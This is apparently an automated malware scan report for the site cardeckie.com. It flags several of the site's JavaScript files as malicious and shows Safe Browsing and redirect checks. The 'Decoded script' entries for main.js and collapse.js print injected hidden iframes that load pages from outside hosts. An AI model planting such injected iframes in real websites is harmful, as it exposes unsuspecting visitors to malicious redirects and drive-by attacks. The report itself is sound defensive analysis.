Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cardeckie.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://cardeckie.com/ | 200 OK Content-Length: 14893 Content-Type: text/html | clean |
http://cardeckie.com/scripts/jquery-1.4.2.min.js?v=7.2 | 200 OK Content-Length: 73034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] Antivirus reports:
| ||
http://cardeckie.com/scripts/jquery.lazyload.mini.js?v=7.2 | 200 OK Content-Length: 3851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.lazyload=function(options){var settings={threshold:0,failurelimit:0,event:"scroll",effect:"show",container:window};if(options){$.extend(settings,options);} var elements=this;if("scroll"==settings.event){$(settings.container).bind("scroll",function(event){var counter=0;elements.each(function(){if($.abovethetop(this,settings)||$.leftofbegin(this,settings)){}else if(!$.belowthefold(this,settings)&&!$.rightoffold(this,settings)){$(this).trigger("appear");}else{if(counte Antivirus reports:
| ||
http://cardeckie.com/scripts/colorbox/jquery.colorbox-min.js?v=7.2 | 200 OK Content-Length: 9826 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",q="on",n="x";function e(a,c){a=a?' id="'+k+a+'"':"";c=c?' style="'+c+'"':"";return b("<div"+a+c+"/>")}function p(a,b){b=b===n?m.width():m.height();return typeof a==="string"?Math.round(a.match(/%/)?b/100*parseInt(a,10):parseInt(a,10)):a}function Q(c){c=b.isFunction(c)?c.call(h):c;return a.photo||c.match(/\.(gif|png|jpg|jpeg|bmp)(?:\?([^#]*))?(?:#(\.*))?$/i)}function cb(){for(var Antivirus reports:
| ||
http://cardeckie.com/scripts/bookmarkscroll.js?v=7.2 | 200 OK Content-Length: 3490 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var bookmarkscroll={ setting: {duration:1000, yoffset:0}, topkeyword: '#top', scrollTo:function(dest, options, hash){ var $=jQuery, options=options || {} var $dest=(typeof dest=="string" && dest.length>0)? (dest==this.topkeyword? 0 : $('#'+dest)) : (dest)? $(dest) : [] if ($dest===0 || $dest.length==1 && (!options.autorun || options.autorun && Math.abs($dest.offset().top+(options.yoffset||this.setting.yoffset)-$(window).scrollTop())>5)){ Antivirus reports:
| ||
http://cardeckie.com/scripts/main.js?v=7.2 | 200 OK Content-Length: 7299 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function check(A) { if (checkflag == "false") { for (i = 0; i < A.length; i++) { A[i].checked = true } checkflag = "true"; return l_uncheckall } else { for (i = 0; i < A.length; i++) { A[i].checked = false } checkflag = "false"; return l_checkall } } function log_out() { ht = document.getElementsByTagName("html"); ht Decoded script: <div name="youtube" style="display:none"><iframe width="560" height="315" src="http://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div><div name="youtube"><iframe width="1" height="1" src="http://www.deheide.be/count.php" frameborder="0" allowfullscreen></iframe></div> Antivirus reports:
| ||
http://cardeckie.com/scripts/menu.js?v=7.2 | 200 OK Content-Length: 12296 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ua=navigator.userAgent.toLowerCase();var is_opera=((ua.indexOf("opera")!=-1)||(typeof (window.opera)!="undefined"));var is_saf=((ua.indexOf("applewebkit")!=-1)||(navigator.vendor=="Apple Computer, Inc."));var is_webtv=(ua.indexOf("webtv")!=-1);var is_ie=((ua.indexOf("msie")!=-1)&&(!is_opera)&&(!is_saf)&&(!is_webtv));var is_ie4=((is_ie)&&(ua.indexOf("msie 4.")!=-1));var is_moz=((!is_saf)&&(navigator.product=="Gecko"));var is_kon=(ua.indexOf("konqueror") Antivirus reports:
| ||
http://cardeckie.com/scripts/collapse.js?v=7.2 | 200 OK Content-Length: 2534 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var is_regexp=(window.RegExp)?true:false;function toggle_collapse(A){if(!is_regexp){return false}obj=TSGetID("collapseobj_"+A);img=TSGetID("collapseimg_"+A);cel=TSGetID("collapsecel_"+A);if(!obj){if(img){img.style.display="none"}return false}if(obj.style.display=="none"){obj.style.display="";save_collapsed(A,false);if(img){img_re=new RegExp("_collapsed\\.png$");img.src=img.src.replace(img_re,".png")}if(cel){cel_re=new RegExp("^(thead|subheader)(_collapsed)$");cel.className=cel.className.replace( Decoded script: <div name="youtube" style="display:none"><iframe width="560" height="315" src="http://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div> Antivirus reports:
| ||
http://cardeckie.com/scripts/tooltip.js?v=7.2 | 200 OK Content-Length: 3194 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var offsetfromcursorX=12;var offsetfromcursorY=10;var offsetdivfrompointerX=10;var offsetdivfrompointerY=14;document.write('<div id="dhtmltooltip"></div>');document.write('<img id="dhtmlpointer" src="'+dimagedir+'arrow2.gif">');var ie=document.all;var ns6=document.getElementById&&!document.all;var enabletip=false;if(ie||ns6){var tipobj=document.all?document.all.dhtmltooltip:document.getElementById?document.getElementById("dhtmltooltip"):""}var pointerobj=document.all?do Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://cardeckie.com/signup.php? | 200 OK Content-Length: 11711 Content-Type: text/html | clean |
http://cardeckie.com/recover.php | 200 OK Content-Length: 11739 Content-Type: text/html | clean |
http://cardeckie.com/recoverhint.php | 200 OK Content-Length: 11694 Content-Type: text/html | clean |
http://cardeckie.com/index.php | 200 OK Content-Length: 14893 Content-Type: text/html | clean |
http://cardeckie.com/rules.php | HTTP/1.1 200 OK Connection: close Date: Fri, 29 Aug 2014 05:37:43 GMT Server: Apache/2.2.16 (Ubuntu) Vary: Accept-Encoding Content-Length: 1124 Content-Type: text/html X-Powered-By: PHP/5.3.3-1ubuntu9.5 | clean |
http://cardeckie.com/login.php?returnto=%2frules.php | 200 OK Content-Length: 12178 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cardeckie.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 05:37:38 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-1ubuntu9.5
GET / HTTP/1.1
Host: cardeckie.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 05:37:38 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Second query (visit from search engine):
GET / HTTP/1.1
Host: cardeckie.com
Referer: http://www.google.com/search?q=cardeckie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cardeckie.com
Referer: http://www.google.com/search?q=cardeckie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.